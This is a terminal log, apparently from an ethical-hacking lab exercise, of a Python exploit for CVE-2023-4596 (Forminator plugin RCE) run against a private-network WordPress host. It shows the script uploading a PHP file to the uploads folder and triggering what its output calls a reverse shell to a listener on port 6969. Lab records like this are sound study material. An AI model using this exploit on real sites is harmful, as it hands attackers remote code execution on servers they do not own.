┌──(kali㉿kali)-[~/lab-eh/modul-2/CVE-2023-4596]
└─$ python3 exploit.py -u http://10.15.42.7:80/?p=7 -r

______                   _             _              ______  _____  _____ 
|@E1A |                 (_)           | |             | ___ \/  __ \|  ___|
| |_ ___  _ __ _ __ ___  _ _ __   __ _| |_ ___  _ __  | |_/ /| /  \/| |__  
|  _/ _ \| '__| '_ ` _ \| | '_ \ / _` | __/ _ \| '__| |    / | |    |  __| 
| || (_) | |  | | | | | | | | | | (_| | || (_) | |    | |\ \ | \__/\| |___ 
\_| \___/|_|  |_| |_| |_|_|_| |_|\__,_|\__\___/|_|    \_| \_| \____/\____/ 
                                                                           

Enter IP address: 192.168.163.141
Enter port: 6969

[+] Sending payload to target
[+] Successful file upload!

Uploaded File Location: http://10.15.42.7:80/wp-content/uploads/2024/05/opYYcWwDpD.php

[+] Sending request to uploaded file...
[-] Request timed out. This could be due to the server being unavailable or because you started an reverse shell
